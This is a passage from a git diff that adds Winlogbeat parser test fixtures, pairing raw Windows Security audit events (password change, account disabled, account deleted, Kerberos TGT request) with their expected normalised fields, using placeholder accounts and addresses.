Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":11608}},\"event_data\":{\"PrivilegeList\":\"-\",\"TargetUserName\":\"ACCOUNT\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"ACCOUNT\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x4a28ebbf\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13043050897,\"event_id\":\"4723\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"123456-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}", + "event": { + "action": "User Account Management", + "code": "4723", + "kind": "event", + "module": "security", + "original": "An attempt was made to change an account's password.\n\nSubject:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\tACCOUNT\n\tAccount Domain:\t\tDOMAIN\n\tLogon ID:\t\t0x4A28EBBF\n\nTarget Account:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\tACCOUNT\n\tAccount Domain:\t\tDOMAIN\n\nAdditional Information:\n\tPrivileges\t\t-", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T08:59:04.757000Z", + "action": { + "id": 4723, + "outcome": "success", + "properties": { + "PrivilegeList": "-", + "SubjectDomainName": "DOMAIN", + "SubjectLogonId": "0x4a28ebbf", + "SubjectUserName": "ACCOUNT", + "SubjectUserSid": "S-1-2-3", + "TargetDomainName": "DOMAIN", + "TargetSid": "S-1-2-3", + "TargetUserName": "ACCOUNT" + } + }, + "agent": { + "ephemeral_id": "11111111-aaaa-2222-bbbb-333333333333", + "id": "123456-abcd-ef90-1234-abcdef123456", + "name": "PC01", + "type": "filebeat", + "version": "8.14.1" + }, + "host": { + "architecture": "x86_64", + "hostname": "pc01", + "id": "xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx", + "ip": [ + "1.2.3.4" + ], + "mac": [ + "00-11-22-33-44-55" + ], + "name": "pc01", + "os": { + "build": "17763.6414", + "family": "windows", + "kernel": "10.0.17763.6414 (WinBuild.160101.0800)", + "name": "Windows Server 2019 Standard", + "platform": "windows", + "type": "windows", + "version": "10.0" + } + }, + "log": { + "level": "information" + }, + "related": { + "hosts": [ + "pc01" + ], + "ip": [ + "1.2.3.4" + ], + "user": [ + "ACCOUNT" + ] + }, + "user": { + "domain": "DOMAIN", + "id": "S-1-2-3", + "name": "ACCOUNT", + "target": { + "domain": "DOMAIN", + "name": "ACCOUNT" + } + }, + "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": "PC01.domain.com", + "event_id": "4723", + "keywords": [ + "Audit Success" + ], + "logon": { + "id": "0x4a28ebbf" + }, + "opcode": "Info", + "process": { + "pid": 756, + "thread": { + "id": 11608 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "13043050897", + "task": "User Account Management" + } + } +} \ No newline at end of file diff --git a/Beats/winlogbeat/tests/security_event_4725.json b/Beats/winlogbeat/tests/security_event_4725.json new file mode 100644 index 000000000..d3826be97 --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4725.json @@ -0,0 +1,111 @@ +{ + "input": { + "message": "{\"@timestamp\":\"2024-11-12T08:41:11.055Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4725\",\"created\":\"2024-11-12T08:41:11.637Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user account was disabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tjdoe\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x493FA12D\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\"},\"message\":\"A user account was disabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tjdoe\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x493FA12D\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":7304}},\"event_data\":{\"TargetUserName\":\"ACCOUNT\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"jdoe\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x493fa12d\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-4-5-6\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13042691344,\"event_id\":\"4725\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}", + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + } + }, + "expected": { + "message": "{\"@timestamp\":\"2024-11-12T08:41:11.055Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4725\",\"created\":\"2024-11-12T08:41:11.637Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user account was disabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tjdoe\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x493FA12D\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\"},\"message\":\"A user account was disabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tjdoe\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x493FA12D\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":7304}},\"event_data\":{\"TargetUserName\":\"ACCOUNT\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"jdoe\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x493fa12d\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-4-5-6\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13042691344,\"event_id\":\"4725\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}", + "event": { + "action": "User Account Management", + "code": "4725", + "kind": "event", + "module": "security", + "original": "A user account was disabled.\n\nSubject:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\tjdoe\n\tAccount Domain:\t\tDOMAIN\n\tLogon ID:\t\t0x493FA12D\n\nTarget Account:\n\tSecurity ID:\t\tS-1-2-3-4-5\n\tAccount Name:\t\tACCOUNT\n\tAccount Domain:\t\tDOMAIN", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T08:41:11.055000Z", + "action": { + "id": 4725, + "outcome": "success", + "properties": { + "SubjectDomainName": "DOMAIN", + "SubjectLogonId": "0x493fa12d", + "SubjectUserName": "jdoe", + "SubjectUserSid": "S-1-2-3", + "TargetDomainName": "DOMAIN", + "TargetSid": "S-4-5-6", + "TargetUserName": "ACCOUNT" + } + }, + "agent": { + "ephemeral_id": "11111111-2222-3333-4444-555555555555", + "id": "12345678-abcd-ef90-1234-abcdef123456", + "name": "PC01", + "type": "filebeat", + "version": "8.14.1" + }, + "host": { + "architecture": "x86_64", + "hostname": "pc01", + "id": "xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx", + "ip": [ + "1.2.3.4" + ], + "mac": [ + "00-11-22-33-44-55" + ], + "name": "pc01", + "os": { + "build": "17763.6414", + "family": "windows", + "kernel": "10.0.17763.6414 (WinBuild.160101.0800)", + "name": "Windows Server 2019 Standard", + "platform": "windows", + "type": "windows", + "version": "10.0" + } + }, + "log": { + "level": "information" + }, + "related": { + "hosts": [ + "pc01" + ], + "ip": [ + "1.2.3.4" + ], + "user": [ + "jdoe" + ] + }, + "user": { + "domain": "DOMAIN", + "id": "S-1-2-3", + "name": "jdoe", + "target": { + "domain": "DOMAIN", + "name": "ACCOUNT" + } + }, + "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": "PC01.domain.com", + "event_id": "4725", + "keywords": [ + "Audit Success" + ], + "logon": { + "id": "0x493fa12d" + }, + "opcode": "Info", + "process": { + "pid": 756, + "thread": { + "id": 7304 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "13042691344", + "task": "User Account Management" + } + } +} \ No newline at end of file diff --git a/Beats/winlogbeat/tests/security_event_4726.json b/Beats/winlogbeat/tests/security_event_4726.json new file mode 100644 index 000000000..73c1d823c --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4726.json @@ -0,0 +1,84 @@ +{ + "input": { + "message": "{\"@version\":\"1\",\"log\":{\"level\":\"information\"},\"@timestamp\":\"2024-11-12T07:58:13.288Z\",\"message\":\"A user account was deleted.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tdoe.j\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3005C1F76\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tsmithee.a\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t-\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"code\":\"4726\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"kind\":\"event\",\"created\":\"2024-11-12T07:58:14.553Z\"},\"agent\":{\"hostname\":\"hostname\",\"id\":\"12345678-ABCD-ef90-1234-abcdef123456\",\"type\":\"winlogbeat\",\"name\":\"hostname\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"version\":\"7.17.1\"},\"zone\":\"int\",\"site\":\"site\",\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"process\":{\"pid\":632,\"thread\":{\"id\":2056}},\"event_data\":{\"SubjectLogonId\":\"0x3005c1f76\",\"PrivilegeList\":\"-\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"doe.j\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3-4-5\",\"TargetUserName\":\"smithee.a\",\"TargetDomainName\":\"DOMAIN\"},\"record_id\":25349190364,\"event_id\":\"4726\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"task\":\"User Account Management\",\"computer_name\":\"hostname.domain.net\"},\"ecs\":{\"version\":\"1.12.0\"},\"host\":{\"name\":\"hostname.domain.net\"},\"tags\":[\"windows\",\"domain-controller\",\"beats_input_codec_plain_applied\"]}", + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + } + }, + "expected": { + "message": "{\"@version\":\"1\",\"log\":{\"level\":\"information\"},\"@timestamp\":\"2024-11-12T07:58:13.288Z\",\"message\":\"A user account was deleted.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tdoe.j\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3005C1F76\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tsmithee.a\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t-\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"code\":\"4726\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"kind\":\"event\",\"created\":\"2024-11-12T07:58:14.553Z\"},\"agent\":{\"hostname\":\"hostname\",\"id\":\"12345678-ABCD-ef90-1234-abcdef123456\",\"type\":\"winlogbeat\",\"name\":\"hostname\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"version\":\"7.17.1\"},\"zone\":\"int\",\"site\":\"site\",\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"process\":{\"pid\":632,\"thread\":{\"id\":2056}},\"event_data\":{\"SubjectLogonId\":\"0x3005c1f76\",\"PrivilegeList\":\"-\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"doe.j\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3-4-5\",\"TargetUserName\":\"smithee.a\",\"TargetDomainName\":\"DOMAIN\"},\"record_id\":25349190364,\"event_id\":\"4726\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"task\":\"User Account Management\",\"computer_name\":\"hostname.domain.net\"},\"ecs\":{\"version\":\"1.12.0\"},\"host\":{\"name\":\"hostname.domain.net\"},\"tags\":[\"windows\",\"domain-controller\",\"beats_input_codec_plain_applied\"]}", + "event": { + "action": "User Account Management", + "code": "4726", + "kind": "event", + "module": "security", + "original": "A user account was deleted.\n\nSubject:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\tdoe.j\n\tAccount Domain:\t\tDOMAIN\n\tLogon ID:\t\t0x3005C1F76\n\nTarget Account:\n\tSecurity ID:\t\tS-1-2-3-4-5\n\tAccount Name:\t\tsmithee.a\n\tAccount Domain:\t\tDOMAIN\n\nAdditional Information:\n\tPrivileges\t-", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T07:58:13.288000Z", + "action": { + "id": 4726, + "outcome": "success", + "properties": { + "PrivilegeList": "-", + "SubjectDomainName": "DOMAIN", + "SubjectLogonId": "0x3005c1f76", + "SubjectUserName": "doe.j", + "SubjectUserSid": "S-1-2-3", + "TargetDomainName": "DOMAIN", + "TargetSid": "S-1-2-3-4-5", + "TargetUserName": "smithee.a" + } + }, + "agent": { + "ephemeral_id": "11111111-2222-3333-4444-555555555555", + "id": "12345678-ABCD-ef90-1234-abcdef123456", + "name": "hostname", + "type": "winlogbeat", + "version": "7.17.1" + }, + "host": { + "name": "hostname.domain.net" + }, + "log": { + "level": "information" + }, + "related": { + "user": [ + "doe.j" + ] + }, + "user": { + "domain": "DOMAIN", + "id": "S-1-2-3", + "name": "doe.j", + "target": { + "domain": "DOMAIN", + "name": "smithee.a" + } + }, + "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": "hostname.domain.net", + "event_id": "4726", + "logon": { + "id": "0x3005c1f76" + }, + "process": { + "pid": 632, + "thread": { + "id": 2056 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "25349190364", + "task": "User Account Management" + } + } +} \ No newline at end of file diff --git a/Beats/winlogbeat/tests/security_event_4768.json b/Beats/winlogbeat/tests/security_event_4768.json new file mode 100644 index 000000000..c7ac196ea --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4768.json @@ -0,0 +1,102 @@ +{ + "input": { + "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un ticket d\u2019authentification Kerberos (TGT) a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount\\n\\tNom du domaine Kerberos fourni :\\tDOMAIN\\n\\tID de l\u2019utilisateur :\\t\\t\\tS-1-2-3\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tservice\\n\\tID du service :\\t\\tS-1-2-3-4-5\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t51261\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810010\\n\\tCode de r\u00e9sultat :\\t\\t0x0\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tType de pr\u00e9-authentification :\\t2\\n\\nInformations sur le certificat :\\n\\tNom de l\u2019\u00e9metteur du certificat :\\t\\t\\n\\tNum\u00e9ro de s\u00e9rie du certificat :\\t\\n\\t Empreinte num\u00e9rique du certificat :\\t\\t\\n\\nLes informations sur le certificat sont fournies uniquement si un certificat a \u00e9t\u00e9 utilis\u00e9 pour la pr\u00e9-authentification.\\n\\nLes types de pr\u00e9-authentification, les options de ticket, les types de chiffrement et les codes de r\u00e9sultats sont d\u00e9finis dans la RFC 4120.\",\"code\":\"4768\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:17:12.392Z\",\"action\":\"Service d\u2019authentification Kerberos\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:17:10.124Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un ticket d\u2019authentification Kerberos (TGT) a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount\\n\\tNom du domaine Kerberos fourni :\\tDOMAIN\\n\\tID de l\u2019utilisateur :\\t\\t\\tS-1-2-3\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tservice\\n\\tID du service :\\t\\tS-1-2-3-4-5\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t51261\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810010\\n\\tCode de r\u00e9sultat :\\t\\t0x0\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tType de pr\u00e9-authentification :\\t2\\n\\nInformations sur le certificat :\\n\\tNom de l\u2019\u00e9metteur du certificat :\\t\\t\\n\\tNum\u00e9ro de s\u00e9rie du certificat :\\t\\n\\t Empreinte num\u00e9rique du certificat :\\t\\t\\n\\nLes informations sur le certificat sont fournies uniquement si un certificat a \u00e9t\u00e9 utilis\u00e9 pour la pr\u00e9-authentification.\\n\\nLes types de pr\u00e9-authentification, les options de ticket, les types de chiffrement et les codes de r\u00e9sultats sont d\u00e9finis dans la RFC 4120.\",\"host\":{\"name\":\"HOSTNAME.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Service d\u2019authentification Kerberos\",\"computer_name\":\"HOSTNAME.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"TicketEncryptionType\":\"0x12\",\"TicketOptions\":\"0x40810010\",\"IpPort\":\"51261\",\"TargetDomainName\":\"DOMAIN\",\"TargetUserName\":\"account\",\"TargetSid\":\"S-1-2-3\",\"PreAuthType\":\"2\",\"Status\":\"0x0\",\"ServiceSid\":\"S-1-2-3-4-5\",\"IpAddress\":\"::ffff:1.2.3.4\",\"ServiceName\":\"service\"},\"process\":{\"thread\":{\"id\":3228},\"pid\":560},\"event_id\":\"4768\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":2476587536},\"@version\":\"1\"}", + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + } + }, + "expected": { + "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un ticket d\u2019authentification Kerberos (TGT) a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount\\n\\tNom du domaine Kerberos fourni :\\tDOMAIN\\n\\tID de l\u2019utilisateur :\\t\\t\\tS-1-2-3\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tservice\\n\\tID du service :\\t\\tS-1-2-3-4-5\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t51261\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810010\\n\\tCode de r\u00e9sultat :\\t\\t0x0\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tType de pr\u00e9-authentification :\\t2\\n\\nInformations sur le certificat :\\n\\tNom de l\u2019\u00e9metteur du certificat :\\t\\t\\n\\tNum\u00e9ro de s\u00e9rie du certificat :\\t\\n\\t Empreinte num\u00e9rique du certificat :\\t\\t\\n\\nLes informations sur le certificat sont fournies uniquement si un certificat a \u00e9t\u00e9 utilis\u00e9 pour la pr\u00e9-authentification.\\n\\nLes types de pr\u00e9-authentification, les options de ticket, les types de chiffrement et les codes de r\u00e9sultats sont d\u00e9finis dans la RFC 4120.\",\"code\":\"4768\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:17:12.392Z\",\"action\":\"Service d\u2019authentification Kerberos\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:17:10.124Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un ticket d\u2019authentification Kerberos (TGT) a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount\\n\\tNom du domaine Kerberos fourni :\\tDOMAIN\\n\\tID de l\u2019utilisateur :\\t\\t\\tS-1-2-3\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tservice\\n\\tID du service :\\t\\tS-1-2-3-4-5\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t51261\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810010\\n\\tCode de r\u00e9sultat :\\t\\t0x0\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tType de pr\u00e9-authentification :\\t2\\n\\nInformations sur le certificat :\\n\\tNom de l\u2019\u00e9metteur du certificat :\\t\\t\\n\\tNum\u00e9ro de s\u00e9rie du certificat :\\t\\n\\t Empreinte num\u00e9rique du certificat :\\t\\t\\n\\nLes informations sur le certificat sont fournies uniquement si un certificat a \u00e9t\u00e9 utilis\u00e9 pour la pr\u00e9-authentification.\\n\\nLes types de pr\u00e9-authentification, les options de ticket, les types de chiffrement et les codes de r\u00e9sultats sont d\u00e9finis dans la RFC 4120.\",\"host\":{\"name\":\"HOSTNAME.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Service d\u2019authentification Kerberos\",\"computer_name\":\"HOSTNAME.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"TicketEncryptionType\":\"0x12\",\"TicketOptions\":\"0x40810010\",\"IpPort\":\"51261\",\"TargetDomainName\":\"DOMAIN\",\"TargetUserName\":\"account\",\"TargetSid\":\"S-1-2-3\",\"PreAuthType\":\"2\",\"Status\":\"0x0\",\"ServiceSid\":\"S-1-2-3-4-5\",\"IpAddress\":\"::ffff:1.2.3.4\",\"ServiceName\":\"service\"},\"process\":{\"thread\":{\"id\":3228},\"pid\":560},\"event_id\":\"4768\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":2476587536},\"@version\":\"1\"}", + "event": { + "action": "Service d\u2019authentification Kerberos", + "code": "4768", + "kind": "event", + "module": "security", + "original": "Un ticket d\u2019authentification Kerberos (TGT) a \u00e9t\u00e9 demand\u00e9.\n\nInformations sur le compte :\n\tNom du compte :\t\taccount\n\tNom du domaine Kerberos fourni :\tDOMAIN\n\tID de l\u2019utilisateur :\t\t\tS-1-2-3\n\nInformations sur le service :\n\tNom du service :\t\tservice\n\tID du service :\t\tS-1-2-3-4-5\n\nInformations sur le r\u00e9seau :\n\tAdresse du client :\t\t::ffff:1.2.3.4\n\tPort client :\t\t51261\n\nInformations suppl\u00e9mentaires :\n\tOptions du ticket :\t\t0x40810010\n\tCode de r\u00e9sultat :\t\t0x0\n\tType de chiffrement du ticket :\t0x12\n\tType de pr\u00e9-authentification :\t2\n\nInformations sur le certificat :\n\tNom de l\u2019\u00e9metteur du certificat :\t\t\n\tNum\u00e9ro de s\u00e9rie du certificat :\t\n\t Empreinte num\u00e9rique du certificat :\t\t\n\nLes informations sur le certificat sont fournies uniquement si un certificat a \u00e9t\u00e9 utilis\u00e9 pour la pr\u00e9-authentification.\n\nLes types de pr\u00e9-authentification, les options de ticket, les types de chiffrement et les codes de r\u00e9sultats sont d\u00e9finis dans la RFC 4120.", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T09:17:10.124000Z", + "action": { + "id": 4768, + "outcome": "success", + "properties": { + "IpAddress": "::ffff:1.2.3.4", + "IpPort": "51261", + "PreAuthType": "2", + "ServiceName": "service", + "ServiceSid": "S-1-2-3-4-5", + "Status": "0x0", + 